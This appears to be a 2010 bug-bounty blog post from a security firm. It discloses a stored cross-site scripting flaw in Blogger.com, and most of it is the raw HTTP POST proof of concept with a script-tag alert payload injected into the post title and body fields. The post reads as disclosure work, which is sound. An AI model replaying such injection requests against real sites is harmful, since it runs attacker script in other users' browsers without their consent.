Bounty Hunting: NO BUGS = NO PAYMENT. Google Vulnerability Rewards Program as the example for payment terms and conditions.
Loading
Hoyt LLC http://cloudscan.me
Example Stored Cross Site Scripting Example in Blogger.com
Discovered August 15, 2010
Below is the example POST I used to create the Robo XSS Bomb
on Blogger today. The Proof of Concept Exploit Example for
Cross Site Scripting is below:
----------------------------------------------------------------
POST /post-create.do HTTP/1.1
Host: www.blogger.com
Proxy-Connection: keep-alive
Referer: http://www.blogger.com/post-create.g?blogID=759650017562661190
Cache-Control: max-age=0
Origin: http://www.blogger.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) Cross Site Scripting Exploiter (Your Site is being crawled for vulnerabilities)
CloudScan XSS Engine http://cloudscan.me
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 675
security_token=lick_my_security_token&blogURL=http%3A%2F%2Fcloudscan.blogspot.com%2F&toggleTime=1&editorModeDefault=2&javascriptEnabled=true&changeLanguage=false&securityToken=JwwHhyUKXI7EBjpXldJid2cubLc%3A1287093379997&postID=&title=5f237%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebcf26d3c915c781b9&url=&enclosuresUiVisible=true&enclosuresDataPresent=true&enclosureUrl.new=&enclosureMimeType.new=&enclosureLength.new=&enclosureCount=0&postBody=5f237%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebcf26d3c915c781b9&postLabels=&commentsMode=ON&backlinksMode=ON&postDate=10%2F14%2F10&postTime=2%3A56+PM&publish=Publish+Post
